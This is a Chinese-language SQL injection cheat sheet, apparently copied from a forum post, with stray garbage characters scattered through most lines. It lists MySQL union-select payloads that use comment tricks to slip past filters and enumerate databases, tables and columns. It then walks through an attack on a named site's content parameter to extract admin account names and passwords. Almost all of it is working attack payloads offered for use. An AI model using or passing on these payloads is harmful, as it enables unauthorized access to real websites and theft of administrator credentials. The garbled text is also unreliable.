查库# m* U2 u( t5 {
) G4 W3 F3 [: h
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*: B! j# ^2 r9 j+ N9 F9 R. f
" V" N+ c6 D6 j9 D/ N查表; e3 M! W/ h6 [7 |
! q- C% D6 i" Y/ N
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
0 y2 z' H9 B- W$ B' S9 T" D: k: |' b' f$ G* o, t6 i
查段7 N' [6 k7 i5 f- K u, ^: A
2 f- w# U8 k4 x* p( i) A
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
# E7 c* X% U4 c. B/ o- R9 v9 h- {+ p, P" M4 F. ^ I+ z( }
4 G4 G% A6 B. n; u' Imysql5高级注入方法暴表( }$ @; X/ p3 G% ?
) N8 K* k; ^" u- t例子如下:
$ H7 ^1 s" Q+ G+ `
3 ~8 _* h- u3 a& p% }- N6 a1.爆表: C! [! w) a& c4 n: r. L
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)& V5 S1 }; Q( _! l
这样爆到第4个时出现了admin_user表。5 G& z/ o8 e9 D, ]+ |1 A
+ ?1 o! ^; X' V; z7 ]0 B2.暴字段; u! d1 e# Z$ e' {4 _
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
" }. J0 i' K9 O7 G0 o2 ], k9 `+ Y) g( p7 E
; d/ o4 G8 |9 J/ k' v/ S
3.爆密码' C- B- O2 g5 g3 L8 c5 B
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* * ^9 h6 S: n; D* i3 @
# T) R ?, e, \# `( p. @
7 }& E; G8 t0 T. `1 c |